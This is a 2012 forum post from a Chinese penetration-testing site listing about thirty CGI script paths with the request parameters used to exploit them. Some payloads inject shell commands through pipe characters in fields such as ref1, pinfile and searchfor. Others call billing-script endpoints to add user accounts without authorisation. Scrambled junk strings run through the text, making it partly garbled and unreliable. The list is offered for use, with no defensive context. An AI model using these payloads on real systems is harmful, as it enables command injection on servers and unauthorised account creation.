中国网络渗透测试联盟

标题: Cgi-bin 30个漏洞+使用方法 [打印本页]

作者: admin    时间: 2012-9-13 16:55
标题: Cgi-bin 30个漏洞+使用方法
==============================
$ C: Z8 H5 s1 I6 X/ E) e
+ l$ E: s5 D" |+ h7 F" u/smspass.pl
9 R: ^) a4 G2 s! G/ k, lusername=username&password=password0 C4 v# G2 z/ {  O2 B

3 V& d2 U& S- O0 _5 e/index.cgi
$ L* x9 l* }! cwei=ren&gen=command! p8 G5 T, K) `( q
; L* X" k: g( _4 \
/passmaster.cgi
/ k! Q9 M6 E6 i, `  A$ A- ~Action=Add&Username=Username&Password=Password
* [, b5 D4 V8 ^; E' X7 b. |
/ x8 {+ v% e1 D% q/accountcreate.cgi0 D) Z" q" m4 Y7 p0 [, `, I
username=username&password=password&ref1=|echo;ls|
8 s6 d( p7 O0 j& ?2 a6 n
6 x. N$ }, O$ m$ [/ q/form.cgi
- i$ T' x) y; Aname=xxxx&email=email&subject=xxxx&response=|echo;ls|
7 |2 ]+ [1 Q. U6 x" {7 l+ B$ f/ h. N' L3 p
/addusr.pl
& `2 a; o0 A6 t( c& T- }/cgi-bin/EuroDebit/addusr.pl) ~$ \" q' d- o5 Q
user=username&pass=Password&confirm=Password/ P, [5 B8 Z: L8 d* u
- ~  \3 d* c- C/ [) `
/ccbill-local.asp+ _# f/ o4 j% F- M; W) Z& r$ m
post_values=username:password2 j# M! O/ v: w2 r6 k  c% K

' L  L# W  B) h( k* U: w, B7 ~. C/count.cgi) }  o% m; m0 B. \# m9 u( \
pinfile=|echo;ls -la;exit|6 s2 Z6 P4 v2 ]: z
8 ^* ^4 A1 M2 t  m; j8 \
/recon.cgi' G' M! G8 M4 ?! @
/recon.cgi?search- A  _& r& C5 u; W+ l3 |0 ^3 a
searchoption=1&searchfor=|echo;ls -al;exit|. v: N" t' ~5 ^
" S2 Q) L7 {2 H, U5 n! `& S" s
/verotelrum.pl) u- n9 n& d% Q
vercode=username:password:dseegsow:add:amount<&30>- ~! R5 i: C. j8 l5 n9 d
' }. F$ {! M2 F5 M, x) G6 U
/af.cgi
5 r  G& ^, J$ |: N_browser_out=|echo;ls -la;exit;|9 u3 S8 x. f  R1 ~3 V5 d# a# Y

3 h4 W4 E7 o1 R* t, J/modify.cgi; l7 H! _: |6 Z5 U/ t2 t& y
username=username&password=password&expire=30
0 c6 B; T3 x2 V7 g; o  L' B% j5 X
/openjournal.cgi) p0 I* j4 l  o% f
edit=1&ct=2&go=|echo;ls -al;exit|
( p/ k# H" ?5 u2 q! h: |; V% i: n5 h
/gx9passwd.cgi7 p" d* h5 V4 T6 L
cmd=ADD&user=username&pass=password
  \7 [  F* l) N
. u5 O4 n' r/ r% K. |/probecontrol.cgi4 F3 l5 G2 ^4 L9 Y
command=enable&username=username&password=password
4 Q4 M% A2 r' o/ R  ]: D0 A
! g# c: I, ]7 r. d  G' R2 W( ~* `/recon.cgi
. V+ i+ M+ T$ D: j2 Usearchoption=3&searchfor=echo;ls -la;exit
- q* e% \9 G. B+ }) d' X6 i7 Z; ~7 H* f
/htadd.pl6 x5 c# A8 |$ t: |/ ~
configfile=|echo; ls -alt; exit
* p: d6 }4 ~; t6 u( ]7 H/ k5 _6 U8 z& V4 x" i6 P
/gx9passwd.cgi
1 c$ B) q: W: i+ rcmd=ADD&user=username&pass=password. n2 h; ]  p0 G" E; P

! g: b( Y. k  g. _/ [" u/ibill*.pl
# R, R2 P% F+ G/ Vreqtype=add&authpwd=authpwd&username=username&password=password* C) A; m: w  q- R& v' W

1 G" h2 R) F+ m4 ]7 V6 ?( O' D/cpay.cgi
7 C0 M% S$ F; Q/ gcommand=add_member&username=username(EMAIL)&password=password(DES)8 ]. {5 L" l/ d$ N$ S
/ W7 S0 Z8 v/ i+ D( [$ P/ I/ U
/globill_ut.cgi
% B1 W/ [" c4 Xdo=add&username=username&password=password&wpassword=password
, Z9 h: W8 T9 a2 n: E1 g
& G; ?. }5 d$ r# _/usercontrol.cgi5 z: ]  G( d4 N- x8 w; L! P
command=enable&username=USER&password=PASS$ x5 C0 X8 T/ T7 i% r7 }9 W

" S* T/ S6 W7 Z+ v/globoSALErum.cgi8 j" p: b/ }8 }2 e6 L! j6 a
action=ADD&seccode=seccode&login=username&password=password
/ \! d+ J" Y# o% y& l  w: j) j( P' n8 T% c6 X3 t3 j
/addusr.pl
# L6 I" [3 F* i8 S9 e% Auser=USER&pass=PASS&confirm=PASS! P! i* t) o: `

# w) s5 p4 s* v, B& ^( `7 U- I/pincount.cgi
) }' u. n. _- `0 A3 p  b* I/cgi-bin/mastergate/pincount.cgi- U' V3 \  \" @; G% [% b  A* H- ?
pinfile=|echo;pwd;exit|  l3 T, _' x. l' j* A; q
$ M; T: m; N% x- c2 a. V$ P
/accountcreate.cgi
, Q7 y7 m5 ^2 D( c* A/cgi-bin/gateway/accountcreate.cgi
! ~) m/ o+ }" T7 I5 b2 ]; Fusername=username&password=password&password2=password&ref1=|echo;ls -al;exit3 A- q( v. L2 F: p$ e  w

4 p1 w: c8 B% E- y$ u9 L$ h; M/af.cgi
" i" ~: W" Y; H# {4 d/env.cgi- K& ?7 @; V5 _+ K( o4 r( S8 P( R
ADD+;echo;pwd;exit/ f$ F  n7 X. t7 J
, M# O9 X8 \* U( Y4 v( d% @" |7 m5 k
/count.cgi
+ [  w9 q- {' ]; rpinfile=|echo;pwd;exit|
, g$ c. ^% r! q  z1 `$ T; B) L: Y/ X! h& E
/recon.cgi1 A; l& I" P7 }* m( p3 w# r( S- v! G
searchoption=1&searchfor=|echo;ls%20-al;exit|
$ i5 z) |7 L( C  K' q  v0 L$ o5 E" B9 A" L4 q
/add.cgi* p# p) |* m, I2 t, u; w/ z
username=username&password=password&expire=302 W, ?& W1 Z% @1 G4 Y6 H; R
6 O# [1 X0 m6 a  y. r
==============================
; {2 R( n& S" Q. H. e, ~1 u8 o




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2